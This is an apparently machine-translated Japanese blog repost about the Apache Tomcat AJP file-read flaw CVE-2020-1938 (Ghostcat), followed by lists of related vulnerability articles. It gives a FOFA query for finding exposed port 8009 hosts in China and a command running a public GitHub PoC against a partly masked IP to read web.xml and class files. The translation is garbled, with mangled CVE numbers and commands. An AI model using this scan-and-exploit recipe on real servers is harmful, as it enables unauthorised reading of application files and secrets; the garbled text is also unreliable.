TomcatのAJPプロトコルファイルには、脆弱性が存在します（CVE-2020から1938） - コードワールド

TomcatのAJPプロトコルファイルには、脆弱性が存在します（CVE-2020から1938）

その他 2020-02-22 15:15:36 訪問数: null

TomcatのAJPプロトコルにより実装に欠陥が原因関連のパラメータ制御、攻撃者は、サーバが読み込み、特定のパラメータを作成することにより、この脆弱性を悪用することができ、ディレクトリにwebappsに任意のファイルを、しかし、親ディレクトリに越えることはできません。

PoC来自GitHubのします。https：//github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

最初のステップ：使用FOFA検索ポート8009

ポート= " 8009 " &&国= " CN "

ステップ2：実行するPoC

python2。7 CNVD- 2020年までに - 10487 -Tomcat-Ajp-lfi.py   151 * *。。。114 -p 8009 -f /WEB-INF/web.xml

1.読むのweb.xml

2.読む*の.classファイル

おすすめ

転載: www.cnblogs.com/dgjnszf/p/12345344.html

TomcatのAJPプロトコルファイルには、脆弱性が存在します（CVE-2020から1938）

Aapache TomcatのAJPファイルは、脆弱性が含まれています（CVE-2020から1938）

[お知らせ] Apache Tomcatの脅威ファイルは脆弱性（CVE-2020から1938）お知らせの脅威が含まれています

整流方式の脆弱性（CVE-2020から1938）を含むされたApache Tomcatファイルの春ブーツWebプロジェクト

CVE-2020-1938 Apache-Tomcat-Ajp（Ghost Cat）ファイルに脆弱性の再現が含まれています

CVE-2020-1938 Apache TomcatのAJPファイルインクルージョンの脆弱性

CVE-2020-1938は、Apache-TomcatのAJP-ファイルは抜け穴再現性が含まれています

Lanling OA には任意のファイルを読み取る脆弱性が存在します

脆弱性再発 - iDocview doc/upload インターフェースに任意のファイル読み取りの脆弱性が存在します (脆弱性検出スクリプトが添付されています)

Tomcatの任意のファイル読み取りの脆弱性の再現、ID：CVE-2020-1938

脆弱性の再現 - Tomcatの任意のファイルアップロードの脆弱性（CVE-2017から12615）

CVE-2020-1938：Apacheの-TomcatのAJP-の脆弱性再現

脆弱性の再発 - 友人の CRM システムの特定のインターフェイスに任意のファイルの読み取りが存在します (脆弱性検出スクリプトが添付されています)

【脆弱性再発】WordPress プラグイン wp-file-manager に任意のファイルがアップロードされる脆弱性（CVE-2020-25213）

Spring Cloud Mirror: CVE-2018-19422 (Subrion CMS 4.2.1 にはファイルアップロードの脆弱性があります)

CVE-2019から11510パルスは、脆弱性を読んでセキュア（PCS）のSSL VP.N任意のファイルを接続します

[再印刷] TomcatのAJPプロトコルの脆弱性分析と使用

CVE-2020-1938：Apache TomcatのAJPコネクタ、リモートでコードが実行される脆弱性を警告

【1日】Ruijie NBRルーターに任意のファイルアップロードの脆弱性が存在

Weblogicの任意のファイルアップロードの脆弱性（CVE-2018から2894）再現

Warburg Pincus Information Technology Co., Ltd. のシステム管理プラットフォーム AVCON6 に、任意のファイルがダウンロードされる脆弱性が存在します。

zeroshell ファイアウォールに任意のファイル読み取りの脆弱性が存在します

CVE-2020-1938のApache-TomcatのAJP-の脆弱性再現

清華！Xのフロントは、任意のファイル削除の脆弱性を再現します

WebLogic任意のファイルアップロード_CVE、2018年から2894年、リモートでコードが実行される脆弱性の再現性

Dahua Smart Parkの総合管理プラットフォームに任意のファイルアップロードの脆弱性が存在

ApacheのActiveMQのファイルサーバー、リモートでコードが実行される脆弱性（CVE-2016から3088）

SMBリモートでコードが実行される脆弱性CVE-2020から0796セキュリティアドバイザリ

SMBリモートでコードが実行される脆弱性CVE-2020から0796セキュリティアドバイザリ

CVE-2020-8209（Citrix Endpoint Management）XenMobile-Consoleに任意のファイル読み取りの脆弱性があります

おすすめ

大規模な言語モデルに基づくオープンソースのナレッジベースの質問と回答システムである MaxKB GitHub Star の数が 5,000 を超えました。

ランキング

短线选股的一种方法

Javaクライアントでのユーバーのリズムワークフローで睡眠時間をキャンセルし、再スケジュール

CALIPSOデータバッチダウンロード方式

LeetCode アルゴリズム再帰クラス - ソードはオファー 26 を参照します。ツリーの部分構造

HTMLのインポート外部CSS、JavaScriptの論文

PostgreSQL 13.1、12.5、11.10、10.15、9.6.20、および9.5.24がリリースされました

アップルは、エラーメッセージがポテトに接続されていた実行する方法ポテトポテトショーをダウンロードすることができません

あなたは空腹で突然電話を切っていますか？これはテクノロジーの裏側ですか、それともテスト用の銃ですか？

VIMエディタのヒント

動的計画法の最長共通部分列（LCS）

アーカイブ

もっと

2024-05-13(8)

2024-05-12(27)

2024-05-11(31)

2024-05-10(33)

2024-05-09(30)

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)

2024-05-05(0)

2024-05-04(18)